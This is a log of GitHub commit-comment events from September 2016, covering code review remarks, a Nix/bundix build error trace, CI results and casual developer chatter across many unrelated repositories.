{"id":"4510334229","type":"CommitCommentEvent","actor":{"login":"grahamc"},"repo":{"name":"manveru/bundix"},"payload":{"comment":{"id":18885539,"position":null,"line":null,"path":null,"commit_id":"0b067da814b9d415f4b066f33572e51ce5ffbe75","created_at":"2016-09-02T19:37:21Z","updated_at":"2016-09-02T19:37:21Z","body":"With this new method, I'm unable to use bundix:\r\n\r\n```\r\n$ bundix\r\n$ nix-build --argstr url https://rubygems.org/gems/puppet-lint-2.0.2.gem /nix/store/ravkc5ijc7v343cwjmp1pmd862ydi7a4-bundix-2.2.0-src/lib/bundix/fetchurl-force.nix\r\nthese derivations will be built:\r\n  /nix/store/xy06g81490d632q44m95v6lckpkxcqim-puppet-lint-2.0.2.gem.drv\r\nbuilding path(s) ‘/nix/store/0f7gnh2wiyjb6ynm5ykf9px6r5ywkdmi-puppet-lint-2.0.2.gem’\r\n\r\ntrying https://rubygems.org/gems/puppet-lint-2.0.2.gem\r\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\r\n                                 Dload  Upload   Total   Spent    Left  Speed\r\n100   154  100   154    0     0    383      0 --:--:-- --:--:-- --:--:--   385\r\n100 60928  100 60928    0     0  92139      0 --:--:-- --:--:-- --:--:--  431k\r\n157jh61jjy7r8fgmmyz7npl2nk0mjrsm5j07631q9r6r2ipk7mfq\r\nadding to nix store...\r\nerror: Nix database directory ‘/nix/var/nix/db’ is not writable: Permission denied\r\nbuilder for ‘/nix/store/xy06g81490d632q44m95v6lckpkxcqim-puppet-lint-2.0.2.gem.drv’ failed with exit code 1\r\nerror: build of ‘/nix/store/xy06g81490d632q44m95v6lckpkxcqim-puppet-lint-2.0.2.gem.drv’ failed\r\nSkipping puppet-lint: no implicit conversion of nil into String\r\n/nix/store/fkzxc03wd65x646sb4gf256glbyf4z8s-ruby-2.3.1-p0/lib/ruby/2.3.0/open3.rb:199:in `spawn'\r\n/nix/store/fkzxc03wd65x646sb4gf256glbyf4z8s-ruby-2.3.1-p0/lib/ruby/2.3.0/open3.rb:199:in `popen_run'\r\n/nix/store/fkzxc03wd65x646sb4gf256glbyf4z8s-ruby-2.3.1-p0/lib/ruby/2.3.0/open3.rb:190:in `popen2e'\r\n/nix/store/fkzxc03wd65x646sb4gf256glbyf4z8s-ruby-2.3.1-p0/lib/ruby/2.3.0/open3.rb:341:in `capture2e'\r\n/nix/store/ravkc5ijc7v343cwjmp1pmd862ydi7a4-bundix-2.2.0-src/lib/bundix.rb:122:in `sh'\r\n/nix/store/ravkc5ijc7v343cwjmp1pmd862ydi7a4-bundix-2.2.0-src/lib/bundix/source.rb:16:in `sh'\r\n/nix/store/ravkc5ijc7v343cwjmp1pmd862ydi7a4-bundix-2.2.0-src/lib/bundix/source.rb:69:in `convert_rubygems'\r\n/nix/store/ravkc5ijc7v343cwjmp1pmd862ydi7a4-bundix-2.2.0-src/lib/bundix/source.rb:6:in `convert'\r\n/nix/store/ravkc5ijc7v343cwjmp1pmd862ydi7a4-bundix-2.2.0-src/lib/bundix.rb:52:in `convert_spec'\r\n/nix/store/ravkc5ijc7v343cwjmp1pmd862ydi7a4-bundix-2.2.0-src/lib/bundix.rb:42:in `block in convert'\r\n/nix/store/ravkc5ijc7v343cwjmp1pmd862ydi7a4-bundix-2.2.0-src/lib/bundix.rb:41:in `reverse_each'\r\n/nix/store/ravkc5ijc7v343cwjmp1pmd862ydi7a4-bundix-2.2.0-src/lib/bundix.rb:41:in `with_object'\r\n/nix/store/ravkc5ijc7v343cwjmp1pmd862ydi7a4-bundix-2.2.0-src/lib/bundix.rb:41:in `convert'\r\n/nix/store/ravkc5ijc7v343cwjmp1pmd862ydi7a4-bundix-2.2.0-src/bin/bundix:83:in `<main>'\r\n```\r\n\r\nand it is really bad: it doesn't even care that I've already loaded this gem in to the store."}},"created_at":"2016-09-02T19:37:21Z"}
{"id":"4510336970","type":"CommitCommentEvent","actor":{"login":"jcormier"},"repo":{"name":"sameersbn/docker-redmine"},"payload":{"comment":{"id":18885545,"position":24,"line":15,"path":"docker-compose.yml","commit_id":"c436a9c650950fb0cea6977339ff2decc780a858","created_at":"2016-09-02T19:37:59Z","updated_at":"2016-09-02T19:37:59Z","body":"Shouldn't this be links?\r\n\r\nhttps://docs.docker.com/compose/compose-file/#links\r\n\r\n> Containers for the linked service will be reachable at a hostname identical to the alias, or the service name if no alias was specified.\r\n\r\n"}},"created_at":"2016-09-02T19:37:59Z"}
{"id":"4510339454","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18885550,"position":null,"line":null,"path":null,"commit_id":"f483a3c5a9b7110aa681e35019b38d1f4fdacdf6","created_at":"2016-09-02T19:38:35Z","updated_at":"2016-09-02T19:38:35Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 912](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12462&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:12:14"}},"created_at":"2016-09-02T19:38:35Z"}
{"id":"4510342819","type":"CommitCommentEvent","actor":{"login":"deepu105"},"repo":{"name":"jhipster/jhipster-registry"},"payload":{"comment":{"id":18885558,"position":45,"line":503,"path":"pom.xml","commit_id":"8f561cbf2c82238c5d6893fcb00f7951a1a83275","created_at":"2016-09-02T19:39:25Z","updated_at":"2016-09-02T19:39:25Z","body":"dont we have to exclude something similar for undertow?"}},"created_at":"2016-09-02T19:39:25Z"}
{"id":"4510346093","type":"CommitCommentEvent","actor":{"login":"cblgh"},"repo":{"name":"nijotz/pixelmap"},"payload":{"comment":{"id":18885566,"position":null,"line":null,"path":null,"commit_id":"2b33e3ce285f1dad1c7d3855b8c6ddf20360a457","created_at":"2016-09-02T19:40:14Z","updated_at":"2016-09-02T19:40:14Z","body":":small_red_triangle: :small_red_triangle_down: "}},"created_at":"2016-09-02T19:40:14Z"}
{"id":"4510349580","type":"CommitCommentEvent","actor":{"login":"kajzersoze"},"repo":{"name":"haecker-felix/gradio"},"payload":{"comment":{"id":18885576,"position":null,"line":null,"path":null,"commit_id":"304761ca07a1df027ece18c3e51d79d06f4141ec","created_at":"2016-09-02T19:41:06Z","updated_at":"2016-09-02T19:41:06Z","body":"GNotification shows icon in Gnome, I had to patch Mate notification daemon in order to show it in Mate.\r\nSo, that part is okay.\r\nProblem now is how to load GLib.Icon from the internet stream or to convert from Pixbuf.\r\nThere is a third way which works, to download image to a temp file and then load the icon from that file.\r\nIf you have any ideas please do tell."}},"created_at":"2016-09-02T19:41:06Z"}
{"id":"4510349951","type":"CommitCommentEvent","actor":{"login":"kimkulling"},"repo":{"name":"assimp/assimp"},"payload":{"comment":{"id":18885577,"position":6,"line":126,"path":"code/BlenderIntermediate.h","commit_id":"b240b9d30dae43fff8009aceefbd0b0c4b8ec613","created_at":"2016-09-02T19:41:11Z","updated_at":"2016-09-02T19:41:11Z","body":"I know, but this  objectcompare only looks for -1 by design.  If you are\nlooking for the rest the importer fails on Windows.\n\nturol <notifications@github.com> schrieb am Fr., 2. Sep. 2016, 20:24:\n\n> strncmp can return any negative value, not just -1.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/assimp/assimp/commit/b240b9d30dae43fff8009aceefbd0b0c4b8ec613#commitcomment-18884640>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACNy1O0_5Nls3KHpjg6ru2SFM9_yax-Rks5qmGmsgaJpZM4Jz912>\n> .\n>\n"}},"created_at":"2016-09-02T19:41:11Z"}
{"id":"4510352529","type":"CommitCommentEvent","actor":{"login":"asfernandes"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18885579,"position":null,"line":null,"path":null,"commit_id":"a23cfb090d09da876f3ef32b6007ef57a9dbaaa3","created_at":"2016-09-02T19:41:48Z","updated_at":"2016-09-02T19:41:48Z","body":"You mean feature \"R-value references\" ?"}},"created_at":"2016-09-02T19:41:48Z"}
{"id":"4510363324","type":"CommitCommentEvent","actor":{"login":"ahocevar"},"repo":{"name":"openlayers/ol3"},"payload":{"comment":{"id":18885599,"position":55,"line":144,"path":"src/ol/renderer/canvas/canvasvectortilelayerrenderer.js","commit_id":"c1b16217f28f50d4585a2ffda603b83042cbd2cc","created_at":"2016-09-02T19:44:22Z","updated_at":"2016-09-02T19:44:22Z","body":"@schmidtk A `@type {ol.VectorTile}` cast would be in line with what we've done elsewhere. Would you be able to provide a quick pull request?"}},"created_at":"2016-09-02T19:44:22Z"}
{"id":"4510365755","type":"CommitCommentEvent","actor":{"login":"cbsan"},"repo":{"name":"cbsan/tools"},"payload":{"comment":{"id":18885603,"position":null,"line":null,"path":null,"commit_id":"bddf7afac9e98470970c99ef16c35992214fcfb4","created_at":"2016-09-02T19:44:58Z","updated_at":"2016-09-02T19:44:58Z","body":"merge"}},"created_at":"2016-09-02T19:44:58Z"}
{"id":"4510374987","type":"CommitCommentEvent","actor":{"login":"Lesc2099SC"},"repo":{"name":"Lesc2099SC/PetShopWebServiceInstagram-1"},"payload":{"comment":{"id":18885626,"position":null,"line":null,"path":null,"commit_id":"9c9503023581250c3746c9615914d598f740500f","created_at":"2016-09-02T19:47:06Z","updated_at":"2016-09-02T19:47:06Z","body":"nnn"}},"created_at":"2016-09-02T19:47:06Z"}
{"id":"4510378551","type":"CommitCommentEvent","actor":{"login":"catterbu"},"repo":{"name":"RFDelaporte/my-project"},"payload":{"comment":{"id":18885631,"position":null,"line":null,"path":null,"commit_id":"d8012da0a5ee77f2ef1b5b0f76e00dc07bbc4795","created_at":"2016-09-02T19:47:56Z","updated_at":"2016-09-02T19:47:56Z","body":"@RFDelaporte The medicare repo was not intended to be brought into this repo. If you were just doing this to experiment, then great. However, the commit message that you used here was entirely unhelpful. Each commit message should describe what you are doing in the commit."}},"created_at":"2016-09-02T19:47:56Z"}
{"id":"4510379400","type":"CommitCommentEvent","actor":{"login":"sampathweb"},"repo":{"name":"dmvpro/dsp"},"payload":{"comment":{"id":18885633,"position":null,"line":null,"path":null,"commit_id":"ae7ea47084783d30e3fe383a03bc7b42d52c91c5","created_at":"2016-09-02T19:48:06Z","updated_at":"2016-09-02T19:48:06Z","body":"@dmvpro Really nice Cheat Sheet and Explanations 👍 "}},"created_at":"2016-09-02T19:48:06Z"}
{"id":"4510380860","type":"CommitCommentEvent","actor":{"login":"tvdeyen"},"repo":{"name":"AlchemyCMS/alchemy_cms"},"payload":{"comment":{"id":18885637,"position":8,"line":null,"path":"config/initializers/dragonfly.rb","commit_id":"f6daedb52dae663f55cacdb197addb811632f7ec","created_at":"2016-09-02T19:48:26Z","updated_at":"2016-09-02T19:48:26Z","body":"Maybe adding the picture id to the URL helps us avoiding potential \"too many files in one\" folder problems?"}},"created_at":"2016-09-02T19:48:26Z"}
{"id":"4510381513","type":"CommitCommentEvent","actor":{"login":"hansfelipepc"},"repo":{"name":"hansfelipepc/apuntes-de-git"},"payload":{"comment":{"id":18885640,"position":null,"line":null,"path":null,"commit_id":"552248266351d8d9892a564a2909371840b9de0c","created_at":"2016-09-02T19:48:35Z","updated_at":"2016-09-02T19:48:35Z","body":"dsa"}},"created_at":"2016-09-02T19:48:35Z"}
{"id":"4510382663","type":"CommitCommentEvent","actor":{"login":"oleksandrzelentsov"},"repo":{"name":"agatakaraskiewicz/magic-pencil"},"payload":{"comment":{"id":18885645,"position":null,"line":null,"path":null,"commit_id":"ad402bdea59acda77df327e0e32ba3d35088b590","created_at":"2016-09-02T19:48:51Z","updated_at":"2016-09-02T19:48:51Z","body":"ideal, but where is the `No arguments` message\r\n^^\r\n"}},"created_at":"2016-09-02T19:48:51Z"}
{"id":"4510384546","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"mstembera/Stockfish"},"payload":{"comment":{"id":18885654,"position":null,"line":null,"path":null,"commit_id":"6e5c07abdd9aa423393e706ff9d8298f4fe42cb8","created_at":"2016-09-02T19:49:18Z","updated_at":"2016-09-02T19:49:18Z","body":"@snicolet Yes exactly I'm trying to increase initiative based on pawn majority.  I will try the idea of adding instead of max and maybe also only consider the strongside instead of both sides.   Also I would like to give a slightly bigger bonus for say a 3 on 2 majority instead of say a 4 on 3 majority even though the delta is 1 for both so this version gives the same.  Not sure about the cleanest way to write it yet.\r\n\r\n@lucabrivio \r\nMaybe be should move more of it into pawns but @snicolet makes good points as well.  Should some version of this pass we can consult Marco."}},"created_at":"2016-09-02T19:49:18Z"}
{"id":"4510386961","type":"CommitCommentEvent","actor":{"login":"oleksandrzelentsov"},"repo":{"name":"agatakaraskiewicz/magic-pencil"},"payload":{"comment":{"id":18885659,"position":30,"line":25,"path":"ball_pyramid.py","commit_id":"77c03184543c416bf614392c77659cec40969370","created_at":"2016-09-02T19:49:51Z","updated_at":"2016-09-02T19:49:51Z","body":"use spaces after `,`"}},"created_at":"2016-09-02T19:49:51Z"}
{"id":"4510389615","type":"CommitCommentEvent","actor":{"login":"sampathweb"},"repo":{"name":"roldatasci/dsp"},"payload":{"comment":{"id":18885666,"position":null,"line":null,"path":null,"commit_id":"4ddafb3e46e02e649646ad62761c95311824fa0a","created_at":"2016-09-02T19:50:28Z","updated_at":"2016-09-02T19:50:28Z","body":"@roldatasci Nice Explanations and really good use of Markdown syntax. 👍 "}},"created_at":"2016-09-02T19:50:28Z"}
{"id":"4510390166","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"mstembera/Stockfish"},"payload":{"comment":{"id":18885668,"position":null,"line":null,"path":null,"commit_id":"6e5c07abdd9aa423393e706ff9d8298f4fe42cb8","created_at":"2016-09-02T19:50:37Z","updated_at":"2016-09-02T19:50:37Z","body":"@snicolet @lucabrivio  Please don't hesitate to submit any variants of this you like."}},"created_at":"2016-09-02T19:50:37Z"}
{"id":"4510391525","type":"CommitCommentEvent","actor":{"login":"oleksandrzelentsov"},"repo":{"name":"agatakaraskiewicz/magic-pencil"},"payload":{"comment":{"id":18885669,"position":41,"line":34,"path":"ball_pyramid.py","commit_id":"77c03184543c416bf614392c77659cec40969370","created_at":"2016-09-02T19:50:56Z","updated_at":"2016-09-02T19:50:56Z","body":"+1 for `secretly-working` pyramid size algorithm"}},"created_at":"2016-09-02T19:50:56Z"}
{"id":"4510392240","type":"CommitCommentEvent","actor":{"login":"aafemt"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18885672,"position":null,"line":null,"path":null,"commit_id":"a23cfb090d09da876f3ef32b6007ef57a9dbaaa3","created_at":"2016-09-02T19:51:07Z","updated_at":"2016-09-02T19:51:07Z","body":"Yes, http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2006/n2027.html\n"}},"created_at":"2016-09-02T19:51:07Z"}
{"id":"4510394324","type":"CommitCommentEvent","actor":{"login":"oleksandrzelentsov"},"repo":{"name":"agatakaraskiewicz/magic-pencil"},"payload":{"comment":{"id":18885675,"position":21,"line":17,"path":"ball_pyramid.py","commit_id":"77c03184543c416bf614392c77659cec40969370","created_at":"2016-09-02T19:51:34Z","updated_at":"2016-09-02T19:51:34Z","body":"good"}},"created_at":"2016-09-02T19:51:34Z"}
{"id":"4510394408","type":"CommitCommentEvent","actor":{"login":"damieng"},"repo":{"name":"primer/octicons"},"payload":{"comment":{"id":18885676,"position":null,"line":null,"path":null,"commit_id":"4bcbb523e6361b47c8ce009b78e77aeeb8b819cc","created_at":"2016-09-02T19:51:35Z","updated_at":"2016-09-02T19:51:35Z","body":"This change included the switch from bower to npm for installation... but also wiped out how to actually reference and use the octicons with the stylesheet reference and class attribute."}},"created_at":"2016-09-02T19:51:35Z"}
{"id":"4510397323","type":"CommitCommentEvent","actor":{"login":"oleksandrzelentsov"},"repo":{"name":"agatakaraskiewicz/magic-pencil"},"payload":{"comment":{"id":18885682,"position":9,"line":7,"path":"ball_pyramid.py","commit_id":"77c03184543c416bf614392c77659cec40969370","created_at":"2016-09-02T19:52:18Z","updated_at":"2016-09-02T19:52:18Z","body":"+1 for documentation on program"}},"created_at":"2016-09-02T19:52:18Z"}
{"id":"4510398521","type":"CommitCommentEvent","actor":{"login":"jinzhangA"},"repo":{"name":"nfcpy/nfcpy"},"payload":{"comment":{"id":18885688,"position":null,"line":null,"path":null,"commit_id":"0630288d9b485259b2b74142819d3416b6958376","created_at":"2016-09-02T19:52:36Z","updated_at":"2016-09-02T19:52:36Z","body":"Hi, I am the guy reported this bug on launchpad. I have tested it with Adafruit board. It's working! Thank you so much. "}},"created_at":"2016-09-02T19:52:36Z"}
{"id":"4510402097","type":"CommitCommentEvent","actor":{"login":"Necktrox"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":18885697,"position":null,"line":null,"path":null,"commit_id":"117eef5f09f873850fe93d00709075761e76a189","created_at":"2016-09-02T19:53:30Z","updated_at":"2016-09-02T19:53:30Z","body":"Works perfectly :tada: "}},"created_at":"2016-09-02T19:53:30Z"}
{"id":"4510403142","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":18885700,"position":null,"line":null,"path":null,"commit_id":"9d858276c1ef029fbc96dcbb401a0f10755016d4","created_at":"2016-09-02T19:53:45Z","updated_at":"2016-09-02T19:53:45Z","body":"Thanks. This also seems to help a lot with https://github.com/official-stockfish/Stockfish/issues/760\r\n"}},"created_at":"2016-09-02T19:53:45Z"}
{"id":"4510405401","type":"CommitCommentEvent","actor":{"login":"cdalibtek"},"repo":{"name":"cdalibtek/OSSelfCheck"},"payload":{"comment":{"id":18885704,"position":null,"line":null,"path":null,"commit_id":"b54dd8f10e80bdd740821bac6fcda7cd77de74a9","created_at":"2016-09-02T19:54:20Z","updated_at":"2016-09-02T19:54:20Z","body":"I am continuing work on the open source self check originally found at https://code.google.com/archive/p/open-source-self-check/."}},"created_at":"2016-09-02T19:54:20Z"}
{"id":"4510405430","type":"CommitCommentEvent","actor":{"login":"sampathweb"},"repo":{"name":"andreaeverett/dsp"},"payload":{"comment":{"id":18885705,"position":null,"line":null,"path":null,"commit_id":"d0e18649d1d56df4ad17dd239f42f75c8094aae4","created_at":"2016-09-02T19:54:20Z","updated_at":"2016-09-02T19:54:20Z","body":"@andreaeverett Nice cheat sheet and good use of Markdown syntax 👍 "}},"created_at":"2016-09-02T19:54:20Z"}
{"id":"4510410810","type":"CommitCommentEvent","actor":{"login":"tvdeyen"},"repo":{"name":"AlchemyCMS/alchemy_cms"},"payload":{"comment":{"id":18885713,"position":8,"line":null,"path":"config/initializers/dragonfly.rb","commit_id":"f6daedb52dae663f55cacdb197addb811632f7ec","created_at":"2016-09-02T19:55:39Z","updated_at":"2016-09-02T19:55:39Z","body":"`:name` is actually `:basename.:ext`. So we can just `:name` here. "}},"created_at":"2016-09-02T19:55:39Z"}
{"id":"4510413986","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":18885719,"position":null,"line":null,"path":null,"commit_id":"8dd0cd2cb2ad6b91719957981a12fe56d3f098b9","created_at":"2016-09-02T19:56:26Z","updated_at":"2016-09-02T19:56:26Z","body":"meni ovo izgleda solidno, nemam komentara - jedino sto mi bode oci je \r\n```\r\n    let photo1 = UIImage(named: \"meal1\")!\r\n        let meal1 = Meal(name: \"Caprese Salad\", photo: photo1, rating: 4)!\r\n        \r\n        let photo2 = UIImage(named: \"meal2\")!\r\n        let meal2 = Meal(name: \"Chicken and Potatoes\", photo: photo2, rating: 5)!\r\n        \r\n        let photo3 = UIImage(named: \"meal3\")!\r\n        let meal3 = Meal(name: \"Pasta with Meatballs\", photo: photo3, rating: 3)!\r\n        \r\n        meals += [meal1, meal2, meal3]\r\n\r\n```\r\nza ovaj primjer je ok, u realnom zivotu ovo je dosta rizicna konstrukcija\r\n\r\ni druga stvar, cisto zbog ljepseg koda da obrises onaj kod koji ne koristis pogotovu onaj koji se automatski kreira prilikom kreiranja controllera / viewa "}},"created_at":"2016-09-02T19:56:26Z"}
{"id":"4510414744","type":"CommitCommentEvent","actor":{"login":"mverdicchio"},"repo":{"name":"saasbook/courseware"},"payload":{"comment":{"id":18885721,"position":null,"line":null,"path":null,"commit_id":"d5804fbc722c6948dfb2353ef4da8086bc8b2d4f","created_at":"2016-09-02T19:56:37Z","updated_at":"2016-09-02T19:56:37Z","body":"Is this change only required for doing javascript stuff from later in the book? It seems to create a top-level directory in the c9 workspace. I'm wondering if I should 1) comment this line out on my fork of the script, 2) tell students to ignore the directory, 3) tell students to delete the directory."}},"created_at":"2016-09-02T19:56:37Z"}
{"id":"4510418420","type":"CommitCommentEvent","actor":{"login":"mojavelinux"},"repo":{"name":"mulesoft/mulesoft-docs"},"payload":{"comment":{"id":18885727,"position":null,"line":null,"path":null,"commit_id":"054dbec9738b88275f0449d49a9dbc16a213dc84","created_at":"2016-09-02T19:57:33Z","updated_at":"2016-09-02T19:57:33Z","body":"When porting changes to the Gradle build from master to a branch, please try to use git's `cherry-pick` command to ensure that improvements are inadvertently rolled back.\r\n\r\nTo use cherry-pick, you find the sha1 hash of the commit that you want to apply, then run:\r\n\r\n```\r\ngit cherry-pick <sha1>\r\n```\r\n\r\nYou do need to apply the commits in the order that they happened. If it fails to apply, it means you are probably missing one of the commits in the sequence."}},"created_at":"2016-09-02T19:57:33Z"}
{"id":"4510418426","type":"CommitCommentEvent","actor":{"login":"Beercow"},"repo":{"name":"kevthehermit/VolUtility"},"payload":{"comment":{"id":18885728,"position":null,"line":null,"path":null,"commit_id":"b2a978ea15d060ccdca2feeeaa32a7a965fcaf6b","created_at":"2016-09-02T19:57:33Z","updated_at":"2016-09-02T19:57:33Z","body":"This is going to be awesome. Can't wait to try :)"}},"created_at":"2016-09-02T19:57:33Z"}
{"id":"4510419282","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18885732,"position":158,"line":158,"path":"ALGORYTHMS/PRIMES_LIST/create_primes_list.cpp","commit_id":"9c7b4e215c0047304b5a29c112d7675f7ea40add","created_at":"2016-09-02T19:57:45Z","updated_at":"2016-09-02T19:57:45Z","body":"ИМХО\r\n```\r\nvector<number_t> max_num_list { 100 };\r\nfor (number_t i = 500; i <= 5000000; i *= 10)\r\n{\r\n    max_num_list.push_back(i);\r\n    max_num_list.push_back(2 * i);\r\n}\r\n```\r\n\r\nПолучается правда длиннее, так что не факт что это хороший вариант."}},"created_at":"2016-09-02T19:57:45Z"}
{"id":"4510419633","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18885734,"position":16,"line":16,"path":"ALGORYTHMS/PRIMES_LIST/debug.h","commit_id":"9c7b4e215c0047304b5a29c112d7675f7ea40add","created_at":"2016-09-02T19:57:49Z","updated_at":"2016-09-02T19:57:49Z","body":"ИМХО, `const`: `operator<<(const T& text)`"}},"created_at":"2016-09-02T19:57:49Z"}
{"id":"4510419918","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18885735,"position":22,"line":22,"path":"ALGORYTHMS/PRIMES_LIST/primes_v1.h","commit_id":"9c7b4e215c0047304b5a29c112d7675f7ea40add","created_at":"2016-09-02T19:57:53Z","updated_at":"2016-09-02T19:57:53Z","body":"ИМХО\r\nМожет не преобразовывать в `double` явно:\r\n```\r\ncheck_num_t root = sqrt(check_num);\r\n```"}},"created_at":"2016-09-02T19:57:53Z"}
{"id":"4510420993","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"athoik/enigma2"},"payload":{"comment":{"id":18885738,"position":null,"line":null,"path":null,"commit_id":"213160652e00deff3ffbba125d427d7a14ed3673","created_at":"2016-09-02T19:58:07Z","updated_at":"2016-09-02T19:58:07Z","body":"< 37659.066> nim.isCompatible(\"DVB-S\") True\r\n< 37659.067> nim.isCompatible(\"DVB-C\") False\r\n< 37659.068> nim.isCompatible(\"DVB-T\") False\r\n< 37659.068> nim.canBeCompatible(\"DVB-S\") True\r\n< 37659.069> nim.canBeCompatible(\"DVB-C\") True\r\n< 37659.070> nim.canBeCompatible(\"DVB-T\") True\r\n\r\nSo I am in a Python plugin and I want to know what is connected to the T2/C socket? How am I supposed to do that. When the tuner is configured as T2 or C I can know with 100% accuracy. But by the look of it once the S2 socket is configured there is no way for the user to tell E2 what else is connected. So there is no way for a plugin to know if a particular tuner can be used to scan on terrestrial or cable. Or am I missing something?"}},"created_at":"2016-09-02T19:58:07Z"}
{"id":"4510423832","type":"CommitCommentEvent","actor":{"login":"sebbekarlsson"},"repo":{"name":"jquery/jquery"},"payload":{"comment":{"id":18885747,"position":76,"line":203,"path":"src/core.js","commit_id":"f519539d3b7a12b67adc3b2c63a19e3beca33a83","created_at":"2016-09-02T19:58:44Z","updated_at":"2016-09-02T19:58:44Z","body":"If I for some strange reason would want an empty function, I could just do \" function () {} \" , I understand that maybe some low level language like Assembly would have some usecase for a \"no operation function\" , but a library for Javascript? Not really, that's like super high level.\r\n\r\nI don't use JQuery myself, but I would really suggest removing this function from the library."}},"created_at":"2016-09-02T19:58:44Z"}
{"id":"4510423828","type":"CommitCommentEvent","actor":{"login":"SH-M"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18885748,"position":null,"line":null,"path":null,"commit_id":"d13e6ddeed75a28c00128d1782106672dd530870","created_at":"2016-09-02T19:58:47Z","updated_at":"2016-09-02T19:58:47Z","body":"Damn! Did I push the wrong file?\r\nThe cockpit should fit, but the instruments won't work which is why I made a new branch for it."}},"created_at":"2016-09-02T19:58:47Z"}
{"id":"4510423840","type":"CommitCommentEvent","actor":{"login":"mmieluch"},"repo":{"name":"mmieluch/laravel-vfs-provider"},"payload":{"comment":{"id":18885749,"position":null,"line":null,"path":null,"commit_id":"4d714405c4a41e579c4668982a931c8be570ae99","created_at":"2016-09-02T19:58:47Z","updated_at":"2016-09-02T19:58:47Z","body":"Alos solves #2."}},"created_at":"2016-09-02T19:58:47Z"}
{"id":"4510425363","type":"CommitCommentEvent","actor":{"login":"jlucidar"},"repo":{"name":"FabMo/FabMo-Engine"},"payload":{"comment":{"id":18885751,"position":5,"line":48,"path":"package.json","commit_id":"78d78c6de82804788763867c7078eeeac7b9968c","created_at":"2016-09-02T19:59:10Z","updated_at":"2016-09-02T19:59:10Z","body":"any reason to remove this ? it may brake the video support..."}},"created_at":"2016-09-02T19:59:10Z"}
{"id":"4510428277","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"EnaTopoljak/Zadace"},"payload":{"comment":{"id":18885757,"position":null,"line":null,"path":null,"commit_id":"fc135dffdcc338326d271a30639ccfe52c5dfd57","created_at":"2016-09-02T19:59:51Z","updated_at":"2016-09-02T19:59:51Z","body":"@EnaTopoljak nedostaje `ViewController.swift` u commitu tako da ti ne mogu zadacu pregledati. molim te komitaj i taj fajl. Hvala"}},"created_at":"2016-09-02T19:59:51Z"}
{"id":"4506180149","type":"CommitCommentEvent","actor":{"login":"jakeonaut"},"repo":{"name":"pura-vida/website"},"payload":{"comment":{"id":18873845,"position":null,"line":null,"path":null,"commit_id":"bdef11e913513555c4d96ae27fead12ff932b1b6","created_at":"2016-09-02T02:04:57Z","updated_at":"2016-09-02T02:04:57Z","body":"a shell of a shell"}},"created_at":"2016-09-02T02:04:57Z"}
{"id":"4506181737","type":"CommitCommentEvent","actor":{"login":"FelicityRainy"},"repo":{"name":"FelicityRainy/blog"},"payload":{"comment":{"id":18873859,"position":1,"line":1,"path":"test.html","commit_id":"20cf748fdaa75f23160066ba7c3c13be233ed4b1","created_at":"2016-09-02T02:05:32Z","updated_at":"2016-09-02T02:05:32Z","body":"more love"}},"created_at":"2016-09-02T02:05:32Z"}
{"id":"4506183028","type":"CommitCommentEvent","actor":{"login":"ca2longoria"},"repo":{"name":"ca2longoria/observer"},"payload":{"comment":{"id":18873862,"position":null,"line":null,"path":null,"commit_id":"01e3eab333e2b749a50e2cc7c08e8adfe49e5d51","created_at":"2016-09-02T02:06:01Z","updated_at":"2016-09-02T02:06:01Z","body":"When did I \"merge branch master\"?  Must've been when I pulled the README.md changes after already making the last commit, but before pushing."}},"created_at":"2016-09-02T02:06:01Z"}
{"id":"4506183507","type":"CommitCommentEvent","actor":{"login":"gilbert-yuan"},"repo":{"name":"gilbert-yuan/gooderp_addons"},"payload":{"comment":{"id":18873875,"position":null,"line":null,"path":null,"commit_id":"9b8b04f9e9b2a191d9cb1b9826dc9fa98c695aab","created_at":"2016-09-02T02:06:10Z","updated_at":"2016-09-02T02:06:10Z","body":"首页进一步完善"}},"created_at":"2016-09-02T02:06:10Z"}
{"id":"4506184451","type":"CommitCommentEvent","actor":{"login":"kylebmetrum"},"repo":{"name":"metrumresearchgroup/mrgsolve"},"payload":{"comment":{"id":18873884,"position":4,"line":27,"path":"rdev/R/aaa.R","commit_id":"69407eb9daa17e86a36be106daa99b7a00cc40dc","created_at":"2016-09-02T02:06:33Z","updated_at":"2016-09-02T02:06:33Z","body":"Create an environment inside `mrgsolve` to store model details (annotation)"}},"created_at":"2016-09-02T02:06:33Z"}
{"id":"4506184594","type":"CommitCommentEvent","actor":{"login":"DanDelluomo"},"repo":{"name":"edwarddonowick/Dojo"},"payload":{"comment":{"id":18873885,"position":null,"line":null,"path":null,"commit_id":"e3339d930094a5243d40353f4f9841110db143ab","created_at":"2016-09-02T02:06:37Z","updated_at":"2016-09-02T02:06:37Z","body":"Sounds cool as shit."}},"created_at":"2016-09-02T02:06:37Z"}
